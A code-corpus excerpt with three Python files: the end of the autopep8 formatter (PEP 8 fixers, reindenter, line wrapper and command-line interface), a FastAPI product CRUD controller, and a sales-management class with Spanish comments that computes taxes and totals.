return [line_index + 1, line_index + 2]\n\n if target.rstrip().endswith(';'):\n self.source[line_index] = target.rstrip('\\n \\r\\t;') + self.newline\n return\n\n offset = result['column'] - 1\n first = target[:offset].rstrip(';')\n second = (_get_indentation(logical_lines[0]) +\n target[offset:].lstrip(';').lstrip())\n\n self.source[line_index] = first + self.newline + second\n\n def fix_e711(self, result):\n \"\"\"Fix comparison.\"\"\"\n line_index = result['line'] - 1\n target = self.source[line_index]\n offset = result['column'] - 1\n\n right_offset = offset + 2\n if right_offset >= len(target):\n return []\n\n left = target[:offset].rstrip()\n center = target[offset:right_offset]\n right = target[right_offset:].lstrip()\n\n if not right.startswith('None'):\n return []\n\n if center.strip() == '==':\n new_center = 'is'\n elif center.strip() == '!=':\n new_center = 'is not'\n else:\n return []\n\n self.source[line_index] = ' '.join([left, new_center, right])\n\n def fix_e721(self, _):\n return self.refactor('idioms')\n\n def fix_w291(self, result):\n fixed_line = self.source[result['line'] - 1].rstrip()\n self.source[result['line'] - 1] = \"%s%s\" % (fixed_line, self.newline)\n\n def fix_w293(self, result):\n assert not self.source[result['line'] - 1].strip()\n self.source[result['line'] - 1] = self.newline\n\n def fix_w391(self, _):\n source = copy.copy(self.source)\n source.reverse()\n blank_count = 0\n for line in source:\n line = line.rstrip()\n if line:\n break\n else:\n blank_count += 1\n source = source[blank_count:]\n source.reverse()\n\n original_length = len(self.source)\n self.source = source\n return range(1, 1 + original_length)\n\n def refactor(self, fixer_name, ignore=None):\n \"\"\"Return refactored code using lib2to3.\n\n Skip if ignore string is produced in the refactored code.\n\n \"\"\"\n from lib2to3 import pgen2\n try:\n new_text = refactor_with_2to3(''.join(self.source),\n fixer_name=fixer_name)\n except pgen2.parse.ParseError:\n return []\n\n if ''.join(self.source).strip() == new_text.strip():\n return []\n 
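# lib2to3 produced a real change: unless it introduced the ignored\n # marker, swap in the refactored text and report every line as modified.\n 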
else:\n if ignore:\n if ignore in new_text and ignore not in ''.join(self.source):\n return []\n original_length = len(self.source)\n self.source = [new_text]\n return range(1, 1 + original_length)\n\n def fix_w601(self, _):\n return self.refactor('has_key')\n\n def fix_w602(self, _):\n \"\"\"Fix deprecated form of raising exception.\"\"\"\n return self.refactor('raise',\n ignore='with_traceback')\n\n def fix_w603(self, _):\n return self.refactor('ne')\n\n def fix_w604(self, _):\n return self.refactor('repr')\n\n\ndef find_newline(source):\n \"\"\"Return type of newline used in source.\"\"\"\n cr, lf, crlf = 0, 0, 0\n for s in source:\n if CRLF in s:\n crlf += 1\n elif CR in s:\n cr += 1\n elif LF in s:\n lf += 1\n _max = max(cr, crlf, lf)\n if _max == lf:\n return LF\n elif _max == crlf:\n return CRLF\n elif _max == cr:\n return CR\n else:\n return LF\n\n\ndef _get_indentword(source):\n \"\"\"Return indentation type.\"\"\"\n sio = StringIO(source)\n indent_word = \" \" # Default in case source has no indentation\n try:\n for t in tokenize.generate_tokens(sio.readline):\n if t[0] == token.INDENT:\n indent_word = t[1]\n break\n except (tokenize.TokenError, IndentationError):\n pass\n return indent_word\n\n\ndef _get_indentation(line):\n \"\"\"Return leading whitespace.\"\"\"\n non_whitespace_index = len(line) - len(line.lstrip())\n return line[:non_whitespace_index]\n\n\ndef _split_indentation(line):\n \"\"\"Return line split into tuple (indentation, rest).\"\"\"\n non_whitespace_index = len(line) - len(line.lstrip())\n return (line[:non_whitespace_index], line[non_whitespace_index:])\n\n\ndef _analyze_pep8result(result):\n tmp = result.split(\":\")\n filename = tmp[0]\n line = int(tmp[1])\n column = int(tmp[2])\n info = \" \".join(result.split()[1:])\n pep8id = info.lstrip().split()[0]\n return dict(id=pep8id, filename=filename, line=line,\n column=column, info=info)\n\n\ndef _get_difftext(old, new, filename):\n diff = unified_diff(old, new, 'original/' + filename, 'fixed/' + filename)\n return \"\".join(diff)\n\n\ndef _priority_key(pep8_result):\n \"\"\"Key for sorting PEP8 results.\n\n Global fixes should be done first. 
This is important for things\n like indentation.\n\n \"\"\"\n priority = ['e101', 'e111', 'w191', # Global fixes\n 'e701', # Fix multiline colon-based before semicolon based\n 'e702', # Break multiline statements early\n 'e225', 'e231', # things that make lines longer\n 'e201', # Remove extraneous whitespace before breaking lines\n 'e501', # before we break lines\n ]\n key = pep8_result['id'].lower()\n if key in priority:\n return priority.index(key)\n else:\n # Lowest priority\n return len(priority)\n\n\ndef _shorten_line(tokens, source, target, indentation, indent_word, newline,\n reverse=False):\n \"\"\"Separate line at OPERATOR.\"\"\"\n max_line_width_minus_indentation = MAX_LINE_WIDTH - len(indentation)\n if reverse:\n tokens.reverse()\n for tkn in tokens:\n # Don't break on '=' after keyword as this violates PEP 8.\n if token.OP == tkn[0] and tkn[1] != '=':\n offset = tkn[2][1] + 1\n if reverse:\n if offset > (max_line_width_minus_indentation -\n len(indent_word)):\n continue\n else:\n if (len(target.rstrip()) - offset >\n (max_line_width_minus_indentation -\n len(indent_word))):\n continue\n first = source[:offset - len(indentation)]\n\n second_indent = indentation\n if first.rstrip().endswith('('):\n second_indent += indent_word\n elif '(' in first:\n second_indent += ' ' * (1 + first.find('('))\n else:\n second_indent += indent_word\n\n second = (second_indent +\n source[offset - len(indentation):].lstrip())\n if not second.strip():\n continue\n\n # Don't modify if lines are not short enough\n if len(first) > max_line_width_minus_indentation:\n continue\n if len(second) > MAX_LINE_WIDTH: # Already includes indentation\n continue\n # Do not begin a line with a comma\n if second.lstrip().startswith(','):\n continue\n # Do end a line with a dot\n if first.rstrip().endswith('.'):\n continue\n if tkn[1] in '+-*/':\n fixed = first + ' \\\\' + newline + second\n else:\n fixed = first + newline + second\n if check_syntax(fixed):\n return indentation + fixed\n return None\n\n\ndef fix_whitespace(line, offset, replacement):\n \"\"\"Replace whitespace at offset and return fixed line.\"\"\"\n # Replace escaped newlines too\n left = line[:offset].rstrip('\\n\\r \\t\\\\')\n right = line[offset:].lstrip('\\n\\r \\t\\\\')\n if right.startswith('#'):\n return line\n else:\n return left + replacement + right\n\n\ndef _spawn_pep8(pep8_options):\n \"\"\"Execute pep8 via subprocess.Popen.\"\"\"\n paths = os.environ['PATH'].split(':')\n for path in paths:\n if os.path.exists(os.path.join(path, PEP8_BIN)):\n cmd = ([os.path.join(path, PEP8_BIN)] +\n pep8_options)\n p = Popen(cmd, stdout=PIPE)\n output = p.communicate()[0].decode('utf-8')\n return [_analyze_pep8result(l)\n for l in output.splitlines()]\n raise Exception(\"'%s' is not found.\" % PEP8_BIN)\n\n\ndef _execute_pep8(pep8_options, source):\n \"\"\"Execute pep8 via python method calls.\"\"\"\n class QuietReport(pep8.BaseReport):\n\n \"\"\"Version of checker that does not print.\"\"\"\n\n def __init__(self, options):\n super(QuietReport, self).__init__(options)\n self.__full_error_results = []\n\n def error(self, line_number, offset, text, _):\n \"\"\"Collect errors.\"\"\"\n code = super(QuietReport, self).error(line_number, offset, text, _)\n if code:\n self.__full_error_results.append(\n dict(id=code, line=line_number,\n column=offset + 1, info=text))\n\n def full_error_results(self):\n \"\"\"Return error results in detail.\n\n Results are in the form of a list of dictionaries. 
Each dictionary\n contains 'id', 'line', 'column', and 'info'.\n\n \"\"\"\n return self.__full_error_results\n\n checker = pep8.Checker('', lines=source,\n reporter=QuietReport, **pep8_options)\n checker.check_all()\n return checker.report.full_error_results()\n\n\nclass Reindenter(object):\n\n \"\"\"Reindents badly-indented code to uniformly use four-space indentation.\n\n Released to the public domain, by Tim Peters, 03 October 2000.\n\n \"\"\"\n\n def __init__(self, input_text):\n self.find_stmt = 1 # next token begins a fresh stmt?\n self.level = 0 # current indent level\n\n # Raw file lines.\n self.raw = input_text\n self.after = None\n\n # File lines, rstripped & tab-expanded. Dummy at start is so\n # that we can use tokenize's 1-based line numbering easily.\n # Note that a line is all-blank iff it's \"\\n\".\n self.lines = [line.rstrip('\\n \\t').expandtabs() + \"\\n\"\n for line in self.raw]\n self.lines.insert(0, None)\n self.index = 1 # index into self.lines of next line\n\n # List of (lineno, indentlevel) pairs, one for each stmt and\n # comment line. indentlevel is -1 for comment lines, as a\n # signal that tokenize doesn't know what to do about them;\n # indeed, they're our headache!\n self.stats = []\n\n def run(self):\n tokens = tokenize.generate_tokens(self.getline)\n try:\n for t in tokens:\n self.tokeneater(*t)\n except (tokenize.TokenError, IndentationError):\n return False\n # Remove trailing empty lines.\n lines = self.lines\n while lines and lines[-1] == \"\\n\":\n lines.pop()\n # Sentinel.\n stats = self.stats\n stats.append((len(lines), 0))\n # Map count of leading spaces to # we want.\n have2want = {}\n # Program after transformation.\n after = self.after = []\n # Copy over initial empty lines -- there's nothing to do until\n # we see a line with *something* on it.\n i = stats[0][0]\n after.extend(lines[1:i])\n for i in range(len(stats) - 1):\n thisstmt, thislevel = stats[i]\n nextstmt = stats[i + 1][0]\n have = _leading_space_count(lines[thisstmt])\n want = thislevel * 4\n if want < 0:\n # A comment line.\n if have:\n # An indented comment line. 
If we saw the same\n # indentation before, reuse what it most recently\n # mapped to.\n want = have2want.get(have, - 1)\n if want < 0:\n # Then it probably belongs to the next real stmt.\n for j in range(i + 1, len(stats) - 1):\n jline, jlevel = stats[j]\n if jlevel >= 0:\n if have == _leading_space_count(lines[jline]):\n want = jlevel * 4\n break\n if want < 0: # Maybe it's a hanging\n # comment like this one,\n # in which case we should shift it like its base\n # line got shifted.\n for j in range(i - 1, -1, -1):\n jline, jlevel = stats[j]\n if jlevel >= 0:\n want = (have + _leading_space_count(\n after[jline - 1]) -\n _leading_space_count(lines[jline]))\n break\n if want < 0:\n # Still no luck -- leave it alone.\n want = have\n else:\n want = 0\n assert want >= 0\n have2want[have] = want\n diff = want - have\n if diff == 0 or have == 0:\n after.extend(lines[thisstmt:nextstmt])\n else:\n for line in lines[thisstmt:nextstmt]:\n if diff > 0:\n if line == \"\\n\":\n after.append(line)\n else:\n after.append(\" \" * diff + line)\n else:\n remove = min(_leading_space_count(line), -diff)\n after.append(line[remove:])\n return self.raw != self.after\n\n def fixed_lines(self):\n return self.after\n\n def getline(self):\n \"\"\"Line-getter for tokenize.\"\"\"\n if self.index >= len(self.lines):\n line = \"\"\n else:\n line = self.lines[self.index]\n self.index += 1\n return line\n\n def tokeneater(self, token_type, _, start, __, line):\n \"\"\"Line-eater for tokenize.\"\"\"\n sline = start[0]\n if token_type == tokenize.NEWLINE:\n # A program statement, or ENDMARKER, will eventually follow,\n # after some (possibly empty) run of tokens of the form\n # (NL | COMMENT)* (INDENT | DEDENT+)?\n self.find_stmt = 1\n\n elif token_type == tokenize.INDENT:\n self.find_stmt = 1\n self.level += 1\n\n elif token_type == tokenize.DEDENT:\n self.find_stmt = 1\n self.level -= 1\n\n elif token_type == tokenize.COMMENT:\n if self.find_stmt:\n self.stats.append((sline, -1))\n # but we're still looking for a new stmt, so leave\n # find_stmt alone\n\n elif token_type == tokenize.NL:\n pass\n\n elif self.find_stmt:\n # This is the first \"real token\" following a NEWLINE, so it\n # must be the first token of the next program statement, or an\n # ENDMARKER.\n self.find_stmt = 0\n if line: # not endmarker\n self.stats.append((sline, self.level))\n\n\nclass Wrapper(object):\n\n \"\"\"Class for functions relating to continuation lines and line folding.\n\n Each instance operates on a single logical line.\n\n \"\"\"\n\n SKIP_TOKENS = frozenset([\n tokenize.COMMENT, tokenize.NL, tokenize.INDENT,\n tokenize.DEDENT, tokenize.NEWLINE, tokenize.ENDMARKER\n ])\n\n def __init__(self, physical_lines, hard_wrap=79, soft_wrap=72):\n if type(physical_lines) != list:\n physical_lines = physical_lines.splitlines(keepends=True)\n self.lines = physical_lines\n self.index = 0\n self.hard_wrap = hard_wrap\n self.soft_wrap = soft_wrap\n self.tokens = list()\n self.rel_indent = None\n sio = StringIO(\"\".join(physical_lines))\n for t in tokenize.generate_tokens(sio.readline):\n if not len(self.tokens) and t[0] in self.SKIP_TOKENS:\n continue\n if t[0] != tokenize.ENDMARKER:\n #if t[2][0] > max_seen:\n #max_seen = t[2][0]\n #print \">>\" + repr(t[4]) + \"<<\"\n self.tokens.append(t)\n self.logical_line, self.mapping = self.build_tokens_logical(\n self.tokens\n )\n\n def build_tokens_logical(self, tokens):\n \"\"\"Build a logical line from a list of tokens.\n\n Returns the logical line and a list of (offset, token) tuples. 
Does\n not mute strings like the version in pep8.py.\n\n \"\"\"\n # from pep8.py with minor modifications\n mapping = []\n logical = []\n length = 0\n previous = None\n for t in tokens:\n token_type, text = t[0:2]\n if token_type in self.SKIP_TOKENS:\n continue\n if previous:\n end_line, end = previous[3]\n start_line, start = t[2]\n if end_line != start_line: # different row\n prev_text = self.lines[end_line - 1][end - 1]\n if prev_text == ',' or (prev_text not in '{[('\n and text not in '}])'):\n logical.append(' ')\n length += 1\n elif end != start: # different column\n fill = self.lines[end_line - 1][end:start]\n logical.append(fill)\n length += len(fill)\n mapping.append((length, t))\n logical.append(text)\n length += len(text)\n previous = t\n logical_line = ''.join(logical)\n assert logical_line.lstrip() == logical_line\n assert logical_line.rstrip() == logical_line\n return logical_line, mapping\n\n def pep8_expected(self):\n \"\"\"Replicates logic in pep8.py, to know what level to indent things to.\n\n Returns a list of lists; each list represents valid indent levels for\n the line in question, relative from the initial indent. However, the\n first entry is the indent level which was expected.\n\n \"\"\"\n\n # What follows is an adjusted version of\n # pep8.py:continuation_line_indentation. All of the comments have been\n # stripped and the 'yield' statements replaced with 'pass'.\n tokens = self.tokens\n if not tokens:\n return\n\n first_row = tokens[0][2][0]\n nrows = 1 + tokens[-1][2][0] - first_row\n\n # here are the return values\n valid_indents = [list()] * nrows\n indent_level = tokens[0][2][1]\n valid_indents[0].append(indent_level)\n\n if nrows == 1:\n # bug, really.\n return valid_indents\n\n indent_next = self.logical_line.endswith(':')\n\n row = depth = 0\n parens = [0] * nrows\n self.rel_indent = rel_indent = [0] * nrows\n indent = [indent_level]\n indent_chances = {}\n last_indent = (0, 0)\n last_token_multiline = None\n\n for token_type, text, start, end, _ in self.tokens:\n newline = row < start[0] - first_row\n if newline:\n row = start[0] - first_row\n newline = (not last_token_multiline and\n token_type not in (tokenize.NL, tokenize.NEWLINE))\n\n if newline:\n # This is where the differences start. Instead of looking at\n # the line and determining whether the observed indent matches\n # our expectations, we decide which type of indentation is in\n # use at the given indent level, and return the offset. This\n # algorithm is susceptible to \"carried errors\", but should\n # through repeated runs eventually solve indentation for\n # multi-line expressions less than PEP8_PASSES_MAX lines long.\n\n if depth:\n for open_row in range(row - 1, -1, -1):\n if parens[open_row]:\n break\n else:\n open_row = 0\n\n # That's all we get to work with. 
This code attempts to\n # \"reverse\" the below logic, and place into the valid indents\n # list\n vi = []\n add_second_chances = False\n if token_type == tokenize.OP and text in ']})':\n # this line starts with a closing bracket, so it needs to\n # be closed at the same indent as the opening one.\n if indent[depth]:\n # hanging indent\n vi.append(indent[depth])\n else:\n # visual indent\n vi.append(indent_level + rel_indent[open_row])\n elif depth and indent[depth]:\n # visual indent was previously confirmed.\n vi.append(indent[depth])\n add_second_chances = True\n elif depth and True in indent_chances.values():\n # visual indent happened before, so stick to\n # visual indent this time.\n if depth > 1 and indent[depth - 1]:\n vi.append(indent[depth - 1])\n else:\n # stupid fallback\n vi.append(indent_level + 4)\n add_second_chances = True\n elif not depth:\n vi.append(indent_level + 4)\n else:\n # must be in hanging indent\n hang = rel_indent[open_row] + 4\n vi.append(indent_level + hang)\n\n # about the best we can do without look-ahead\n if indent_next and vi[0] == indent_level + 4 and \\\n nrows == row + 1:\n vi[0] += 4\n\n if add_second_chances:\n # visual indenters like to line things up.\n min_indent = vi[0]\n for col, what in indent_chances.items():\n if col > min_indent and (\n what is True or\n (what == str and token_type == tokenize.STRING) or\n (what == text and token_type == tokenize.OP)\n ):\n vi.append(col)\n vi = sorted(vi)\n\n valid_indents[row] = vi\n\n # ...returning to original continuation_line_identation func...\n visual_indent = indent_chances.get(start[1])\n last_indent = start\n rel_indent[row] = start[1] - indent_level\n hang = rel_indent[row] - rel_indent[open_row]\n\n if token_type == tokenize.OP and text in ']})':\n if indent[depth]:\n if start[1] != indent[depth]:\n pass # E124\n elif hang:\n pass # E123\n elif visual_indent is True:\n if not indent[depth]:\n indent[depth] = start[1]\n elif visual_indent in (text, str):\n pass\n elif indent[depth] and start[1] < indent[depth]:\n pass # E128\n elif hang == 4 or (indent_next and rel_indent[row] == 8):\n pass\n else:\n if hang <= 0:\n pass # E122\n elif indent[depth]:\n pass # E127\n elif hang % 4:\n pass # E121\n else:\n pass # E126\n\n # line altered: comments shouldn't define a visual indent\n if parens[row] and not indent[depth] and token_type not in (\n tokenize.NL, tokenize.COMMENT\n ):\n indent[depth] = start[1]\n indent_chances[start[1]] = True\n elif token_type == tokenize.STRING or text in (\n 'u', 'ur', 'b', 'br'\n ):\n indent_chances[start[1]] = str\n\n if token_type == tokenize.OP:\n if text in '([{':\n depth += 1\n indent.append(0)\n parens[row] += 1\n elif text in ')]}' and depth > 0:\n prev_indent = indent.pop() or last_indent[1]\n for d in range(depth):\n if indent[d] > prev_indent:\n indent[d] = 0\n for ind in list(indent_chances):\n if ind >= prev_indent:\n del indent_chances[ind]\n depth -= 1\n if depth and indent[depth]: # modified\n indent_chances[indent[depth]] = True\n for idx in range(row, -1, -1):\n if parens[idx]:\n parens[idx] -= 1\n break\n assert len(indent) == depth + 1\n if start[1] not in indent_chances:\n indent_chances[start[1]] = text\n\n last_token_multiline = (start[0] != end[0])\n\n if indent_next and rel_indent[-1] == 4:\n pass # E125\n\n return valid_indents\n\n\ndef _leading_space_count(line):\n \"\"\"Return number of leading spaces in line.\"\"\"\n i = 0\n while i < len(line) and line[i] == ' ':\n i += 1\n return i\n\n\ndef refactor_with_2to3(source_text, fixer_name):\n 
\"\"\"Use lib2to3 to refactor the source.\n\n Return the refactored source code.\n\n \"\"\"\n from lib2to3 import refactor\n fixers = ['lib2to3.fixes.fix_' + fixer_name]\n tool = refactor.RefactoringTool(\n fixer_names=fixers,\n explicit=fixers)\n return str(tool.refactor_string(source_text, name=''))\n\n\ndef break_multi_line(source_text, newline, indent_word):\n \"\"\"Break first line of multi-line code.\n\n Return None if a break is not possible.\n\n \"\"\"\n # Handle special case only.\n if ('(' in source_text and source_text.rstrip().endswith(',')):\n index = 1 + source_text.find('(')\n if index >= MAX_LINE_WIDTH:\n return None\n\n # Make sure we are not in a string.\n for quote in ['\"', \"'\"]:\n if quote in source_text:\n if source_text.find(quote) < index:\n return None\n\n # Make sure we are not in a comment.\n if '#' in source_text:\n if source_text.find('#') < index:\n return None\n\n assert index < len(source_text)\n return (\n source_text[:index].rstrip() + newline +\n _get_indentation(source_text) + indent_word +\n source_text[index:].lstrip())\n else:\n return None\n\n\ndef check_syntax(code):\n \"\"\"Return True if syntax is okay.\"\"\"\n try:\n return compile(code, '', 'exec')\n except (SyntaxError, TypeError, UnicodeDecodeError):\n return False\n\n\ndef fix_file(filename, opts, output=sys.stdout):\n tmp_source = read_from_filename(filename)\n\n # Add missing newline (important for diff)\n tmp_newline = find_newline(tmp_source)\n if tmp_source == tmp_source.rstrip(tmp_newline):\n tmp_source += tmp_newline\n\n fix = FixPEP8(filename, opts, contents=tmp_source)\n fixed_source = fix.fix()\n original_source = copy.copy(fix.original_source)\n tmp_filename = filename\n if not pep8 or opts.in_place:\n encoding = detect_encoding(filename)\n for _ in range(opts.pep8_passes):\n if fixed_source == tmp_source:\n break\n tmp_source = copy.copy(fixed_source)\n if not pep8:\n tmp_filename = tempfile.mkstemp()[1]\n fp = open_with_encoding(tmp_filename, encoding=encoding, mode='w')\n fp.write(fixed_source)\n fp.close()\n fix = FixPEP8(tmp_filename, opts, contents=tmp_source)\n fixed_source = fix.fix()\n if not pep8:\n os.remove(tmp_filename)\n del tmp_filename\n del tmp_source\n\n if opts.diff:\n new = StringIO(''.join(fix.source))\n new = new.readlines()\n output.write(_get_difftext(original_source, new, filename))\n elif opts.in_place:\n fp = open_with_encoding(filename, encoding=encoding,\n mode='w')\n fp.write(fixed_source)\n fp.close()\n else:\n output.write(fixed_source)\n\n\ndef parse_args(args):\n \"\"\"Parse command-line options.\"\"\"\n parser = OptionParser(usage='Usage: autopep8 [options] '\n '[filename [filename ...]]',\n version=\"autopep8: %s\" % __version__,\n description=__doc__,\n prog='autopep8')\n parser.add_option('-v', '--verbose', action='store_true', dest='verbose',\n help='print verbose messages')\n parser.add_option('-d', '--diff', action='store_true', dest='diff',\n help='print the diff for the fixed source')\n parser.add_option('-i', '--in-place', action='store_true',\n help='make changes to files in place')\n parser.add_option('-r', '--recursive', action='store_true',\n help='run recursively; must be used with --in-place or '\n '--diff')\n parser.add_option('-p', '--pep8-passes',\n default=PEP8_PASSES_MAX, type='int',\n help='maximum number of additional pep8 passes'\n ' (default: %default)')\n parser.add_option('--ignore', default='',\n help='do not fix these errors/warnings (e.g. 
E4,W)')\n parser.add_option('--select', default='',\n help='select errors/warnings (e.g. E4,W)')\n opts, args = parser.parse_args(args)\n\n if not len(args):\n parser.error('incorrect number of arguments')\n\n if len(args) > 1 and not (opts.in_place or opts.diff):\n parser.error('autopep8 only takes one filename as argument '\n 'unless the \"--in-place\" or \"--diff\" options are '\n 'used')\n\n if opts.recursive and not (opts.in_place or opts.diff):\n parser.error('--recursive must be used with --in-place or --diff')\n\n if opts.in_place and opts.diff:\n parser.error('--in-place and --diff are mutually exclusive')\n\n return opts, args\n\n\ndef main():\n \"\"\"Tool main.\"\"\"\n opts, args = parse_args(sys.argv[1:])\n if opts.in_place or opts.diff:\n filenames = list(set(args))\n else:\n assert len(args) == 1\n assert not opts.recursive\n filenames = args[:1]\n\n while filenames:\n name = filenames.pop(0)\n if opts.recursive and os.path.isdir(name):\n for root, directories, children in os.walk(name):\n filenames += [os.path.join(root, f) for f in children\n if f.endswith('.py') and\n not f.startswith('.')]\n for d in directories:\n if d.startswith('.'):\n directories.remove(d)\n else:\n if opts.verbose:\n sys.stderr.write('[file:%s]\\n' % name)\n try:\n fix_file(name, opts)\n except (UnicodeDecodeError, UnicodeEncodeError, IOError) as error:\n sys.stderr.write(str(error) + '\\n')\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"funningboy/vim","sub_path":"pylibs/autopep8.py","file_name":"autopep8.py","file_ext":"py","file_size_in_byte":55134,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"21366558893","text":"from fastapi.params import Header\n\nfrom pim_vi.controller import Controller\nfrom pim_vi.model import Product\nfrom pim_vi.model.product_model import ProductModel\n\n\nclass ProductController(Controller):\n def __init__(self, app):\n super().__init__()\n app.post(\"/product\")(self.create_product)\n app.get(\"/product/{product_id}\")(self.get_product)\n app.get(\"/product\")(self.get_products)\n app.delete(\"/product/{product_id}\")(self.delete_product)\n app.put(\"/product/{product_id}\")(self.update_product)\n\n async def create_product(self, product: Product, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.create_product(product)\n if not product:\n return {\"message\": \"Product not created\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao criar produto\", \"error\": e}\n\n async def get_products(self):\n try:\n async with ProductModel() as m:\n products = await m.get_all_products()\n if not products:\n return {\"message\": \"Products not found\"}\n return products\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produtos\", \"error\": e}\n\n async def get_product(self, product_id: str, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.get_product(product_id)\n if not product:\n return {\"message\": \"Product not found\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produto\", \"error\": e}\n\n async def delete_product(self, product_id: str, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await 
m.delete_product(product_id)\n if not product:\n return {\"message\": \"Product not found\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produto\", \"error\": e}\n\n async def update_product(self, product_id: str, product: Product, authorization: str = Header(None)):\n try:\n user_id = super().get_id_from_token(authorization)\n async with ProductModel() as m:\n product = await m.update_product_by_id(product_id, product)\n if not product:\n return {\"message\": \"Product not found\"}\n return product\n except Exception as e:\n print(e)\n return {\"message\": \"Erro ao buscar produto\", \"error\": e}\n","repo_name":"EdSL88/PimVIBack","sub_path":"pim_vi/controller/product_controller.py","file_name":"product_controller.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"72119589681","text":"from GestiondeClientes import GestiondeClientes\r\nfrom GestiondeProductos import GestiondeProductos\r\nfrom GestiondePagos import GestiondePagos\r\nfrom GestiondeEnvios import GestiodeEnvios\r\n\r\n\r\nclass GestiondeVentas:\r\n #First we create the constructor to set up the attributes we need\r\n\r\n def __init__ (self,cliente,productos,cantidad,pago,envio,subtotal,descuentos,iva,igtf,total,fecha):\r\n self.cliente=cliente\r\n self.productos=productos\r\n self.cantidad=cantidad\r\n self.pago=pago\r\n self.envio=envio\r\n self.subtotal=subtotal\r\n self.descuentos=descuentos\r\n self.iva=iva\r\n self.igtf=igtf\r\n self.total=total\r\n self.fecha=fecha\r\n self.CompraProductos=[]\r\n self.ventas=[]\r\n\r\n \r\n #A series of small methods that keep the calculations simple instead of one long method\r\n def calcular_descuento(self):\r\n if self.cliente.tipo == \"Juridico\":\r\n self.descuentos=self.subtotal * 0.05\r\n else:\r\n self.descuentos= 0\r\n \r\n def calcular_iva(self):\r\n self.calcular_subtotal()\r\n self.iva= self.subtotal * 0.16\r\n \r\n def calcular_igtf(self):\r\n if self.pago.tipodepago in (\"Efectivo\", \"Tarjeta internacional\", \"Zelle\"):\r\n self.igtf= self.subtotal * 0.03\r\n else:\r\n self.igtf= 0\r\n\r\n\r\n def calcular_subtotal(self): \r\n self.subtotal= sum(i[1] * i[2] for i in self.CompraProductos)\r\n\r\n\r\n def calcular_Total(self):\r\n self.calcular_descuento() \r\n self.calcular_iva()\r\n self.calcular_igtf() \r\n self.total = self.subtotal - self.descuentos + self.iva + self.igtf\r\n\r\n #Validation helper reused wherever an ID number is read; returns the valid value\r\n\r\n def validacionCI(self,CI):\r\n while not CI.isdigit():\r\n print(\"Introduzca una cedula valida\")\r\n CI=input(\"CI: \")\r\n return CI\r\n \r\n #This method first calls other classes so their attributes can be reached\r\n #A few conditionals look up the requested objects and print error messages\r\n #when nothing matching is registered\r\n\r\n\r\n def RegistrarVenta(self, clienteB, prodB):\r\n clienteB=GestiondeClientes()\r\n prodB=GestiondeProductos()\r\n print(\"Desea buscar el cliente mediante cedula o email?\")\r\n decisionCI=input(\"CI (1) correo(2)\")\r\n while decisionCI not in (\"1\" ,\"2\"):\r\n print(\"Introduzca una opcion valida\")\r\n print(\"Desea buscar el cliente mediante cedula o email?\")\r\n decisionCI=input(\"CI (1) correo(2)\")\r\n if decisionCI==\"1\":\r\n cedulacliente=input(\"CI del cliente: \\n\")\r\n cedulacliente=self.validacionCI(cedulacliente)\r\n 
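# Look up the registered client that matches the validated ID\r\n 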
cliente=clienteB.buscar_CI(cedulacliente)\r\n\r\n elif decisionCI==\"2\":\r\n correocliente=input(\"Correo del cliente:\\n\")\r\n cliente=clienteB.buscar_correo(correocliente)\r\n if cliente is None:\r\n print(\"El cliente no se encuentra registrado.\")\r\n return\r\n\r\n #Keep the client that was found so the rest of the sale uses it\r\n self.cliente=cliente\r\n\r\n #The client's attributes are shown to avoid confusion\r\n\r\n print(f\"La compra es a nombre de {cliente.nombre} {cliente.apellido}\")\r\n \r\n #Now the same is done for the products, with small changes, since the quantity\r\n #of each one to buy must be chosen \r\n\r\n print(\"Desea agregar un producto?\")\r\n AgregarProductos=input(\"Si (1) No(2)\")\r\n while AgregarProductos ==\"1\":\r\n print(\"Que producto va a comprar\")\r\n producto=input(\"Nombre del producto:\")\r\n prod=prodB.buscar_name(producto)\r\n if prod is None:\r\n print(\"No disponemos del producto\")\r\n return\r\n else:\r\n cantidad=int(input(\"Cantidad a comprar:\"))\r\n precio=prod.precio\r\n self.CompraProductos.append([prod, cantidad, precio])\r\n AgregarProductos=input(\"Si (1) No(2)\")\r\n\r\n #The GestiondePagos module is used so the purchase stays consistent, that is, the\r\n #parts are related instead of independent, sharing the same values \r\n #and keeping the code simple\r\n\r\n\r\n self.pago=GestiondePagos(self.cliente)\r\n \r\n self.pago.RegistrarPago()\r\n self.pago.RegistrarFechaActual()\r\n self.fecha = self.pago.fecha\r\n\r\n #The same with the GestiodeEnvios module\r\n self.envio=GestiodeEnvios()\r\n self.envio.RegistrarEnvio() \r\n\r\n\r\n #The calculations run with the payment values together with the product values\r\n \r\n self.calcular_Total()\r\n self.total+=self.envio.costoenvio\r\n\r\n #The cost is determined and the total is shown with and without discount; with no\r\n #discount both are the same\r\n\r\n print(f\"Subtotal antes de descuentos: {self.subtotal}\")\r\n print(f\"El total de la compra sería: {self.total}\")\r\n\r\n #Finally the user is asked whether the purchase should really go ahead, since\r\n #mix-ups with the prices can happen. 
